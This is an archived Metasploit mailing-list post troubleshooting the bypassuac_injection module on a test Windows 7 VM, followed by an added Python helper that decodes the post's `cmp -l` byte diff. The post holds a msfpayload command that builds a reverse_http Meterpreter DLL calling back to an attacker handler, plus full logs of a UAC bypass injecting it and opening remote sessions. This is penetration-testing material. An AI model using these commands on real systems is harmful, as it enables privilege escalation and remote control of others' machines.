Metasploit mailing list archives
Custom exe not working for bypassuac_injection
From: Who Few <whothefew () yahoo com>
Date: Sat, 10 May 2014 09:19:23 -0700 (PDT)
I have noticed some very odd behavior with the exploit/windows/local/bypassuac_injection module. On a test Win7 SP1 32bit VM, if I specify a custom exe, I get 2 shells and an error message on the client side: "Windows encountered an internal error while initializing COM libraries". I have tried many different combinations of settings and payloads and nothing works satisfactorily. If I do not set the custom exe variable, Metasploit's automatically generated shellcode works perfectly. Likewise, if I capture the payload dll from the client machine and specify it as the custom exe, it also works flawlessly. The only problem arises when I generate a payload dll using msfpayload. Here is a byte comparison of the automatically generated payload and the msfpayload generated payload, both of which used the same default settings.

root@Kali:~/uac/http# cmp -l http.dll CRYPTBASE.dll
1669 124 120
1670 150 162
1671 162 157
1672 145 143
1673 141 145
1674 144 163
1675 0 163
2301 116 147
2302 162 65
2303 126 107
2304 106 171

root@Kali:~/uac/http# msfpayload -p windows/meterpreter/reverse_http LHOST=192.168.1.120 LPORT=8080 D > http.dll
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_http
Length: 331
Options: {"LHOST"=>"192.168.1.120", "LPORT"=>"8080"}

The results of a test run for each dll:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 192.168.1.120
LHOST => 192.168.1.120
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTP reverse handler on http://0.0.0.0:8080/
[*] Starting the payload handler...
[*] 192.168.1.135:52562 Request received for /y6gF...
[*] 192.168.1.135:52562 Staging connection for target /y6gF received...
[*] Patched user-agent at offset 663640...
[*] Patched transport at offset 663304...
[*] Patched URL at offset 663368...
[*] Patched Expiration Timeout at offset 664240...
[*] Patched Communication Timeout at offset 664244...
[*] Meterpreter session 13 opened (192.168.1.120:8080 -> 192.168.1.135:52562) at 2014-05-08 12:54:51 -0700
msf exploit(handler) > use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > set session 13
session => 13
msf exploit(bypassuac_injection) > set verbose true
verbose => true
msf exploit(bypassuac_injection) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(bypassuac_injection) > set EXE::Custom /root/uac/http/http.dll
EXE::Custom => /root/uac/http/http.dll
msf exploit(bypassuac_injection) > exploit
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Using custom payload /root/uac/http/http.dll, RHOST and RPORT settings will be ignored!
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 5120 bytes long being uploaded..
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 1952
[*] Opening process 1952
[*] Executing payload
[+] Successfully injected payload in to process: 1952
[*] 192.168.1.135:52851 Request received for /ChbO...
[*] 192.168.1.135:52851 Staging connection for target /ChbO received...
[*] Patched user-agent at offset 663640...
[*] Patched transport at offset 663304...
[*] Patched URL at offset 663368...
[*] Patched Expiration Timeout at offset 664240...
[*] Patched Communication Timeout at offset 664244...
[*] Meterpreter session 14 opened (192.168.1.120:8080 -> 192.168.1.135:52851) at 2014-05-08 12:55:11 -0700
[*] 192.168.1.135:52853 Request received for /ChbO...
[*] 192.168.1.135:52853 Staging connection for target /ChbO received...
[*] Patched user-agent at offset 663640...
[*] Patched transport at offset 663304...
[*] Patched URL at offset 663368...
[*] Patched Expiration Timeout at offset 664240...
[*] Patched Communication Timeout at offset 664244...
[*] Meterpreter session 15 opened (192.168.1.120:8080 -> 192.168.1.135:52853) at 2014-05-08 12:55:11 -0700
[*] Cleaning up payload file...
msf exploit(bypassuac_injection) > set EXE::Custom /root/uac/http/CRYPTBASE.dll
EXE::Custom => /root/uac/http/CRYPTBASE.dll
msf exploit(bypassuac_injection) > exploit
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Using custom payload /root/uac/http/CRYPTBASE.dll, RHOST and RPORT settings will be ignored!
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 5120 bytes long being uploaded..
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 2124
[*] Opening process 2124
[*] Executing payload
[+] Successfully injected payload in to process: 2124
[*] Cleaning up payload file...
[*] 192.168.1.135:53466 Request received for /g5Gy...
[*] 192.168.1.135:53466 Staging connection for target /g5Gy received...
[*] Patched user-agent at offset 663640...
[*] Patched transport at offset 663304...
[*] Patched URL at offset 663368...
[*] Patched Expiration Timeout at offset 664240...
[*] Patched Communication Timeout at offset 664244...
[*] Meterpreter session 16 opened (192.168.1.120:8080 -> 192.168.1.135:53466) at 2014-05-08 13:03:04 -0700
msf exploit(bypassuac_injection) >

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
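The `cmp -l` listing in the post is hard to read as raw columns (1-based offsets, octal byte values). The following is an added example, not code from the post or from Metasploit, that parses that listing, groups adjacent offsets into runs and renders each side as bytes; the eleven `cmp` lines above are embedded as constructed input. The second run decodes to the same four characters, g5Gy, that appear as the request path in the handler log for the CRYPTBASE.dll session, which is how one can tell which differing bytes are per-build randomness and which are a real configuration difference between two artifacts.

```python
import re

# Constructed sample: the `cmp -l http.dll CRYPTBASE.dll` output quoted in the
# post, one differing byte per line (1-based offset, byte in file 1, byte in
# file 2). GNU cmp prints the byte values in octal.
CMP_OUTPUT = """\
1669 124 120
1670 150 162
1671 162 157
1672 145 143
1673 141 145
1674 144 163
1675 0 163
2301 116 147
2302 162 65
2303 126 107
2304 106 171
"""

# offset, octal byte from file 1, octal byte from file 2; anything else
# (e.g. cmp's trailing "EOF on ..." notice) is skipped by the parser.
_LINE = re.compile(r"^\s*(\d+)\s+([0-7]+)\s+([0-7]+)\s*$")

def parse_cmp_l(text):
    """Return (zero_based_offset, byte_in_file1, byte_in_file2) tuples."""
    rows = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if m:
            rows.append((int(m.group(1)) - 1, int(m.group(2), 8), int(m.group(3), 8)))
    return rows

def group_runs(rows):
    """Merge adjacent offsets into runs of (start_offset, bytes1, bytes2)."""
    runs = []
    for off, b1, b2 in rows:
        if runs and off == runs[-1][0] + len(runs[-1][1]):
            runs[-1][1].append(b1)
            runs[-1][2].append(b2)
        else:
            runs.append([off, [b1], [b2]])
    return [(off, bytes(a), bytes(b)) for off, a, b in runs]

def describe(text):
    """One line per run: start offset and both files' bytes as Python literals."""
    return [f"offset {off:#x}: {a!r} -> {b!r}"
            for off, a, b in group_runs(parse_cmp_l(text))]

if __name__ == "__main__":
    print("\n".join(describe(CMP_OUTPUT)))
```

To compare two real files, pipe `cmp -l A B` into this script instead of using the embedded sample; the offsets it reports are zero-based, as a hex editor shows them.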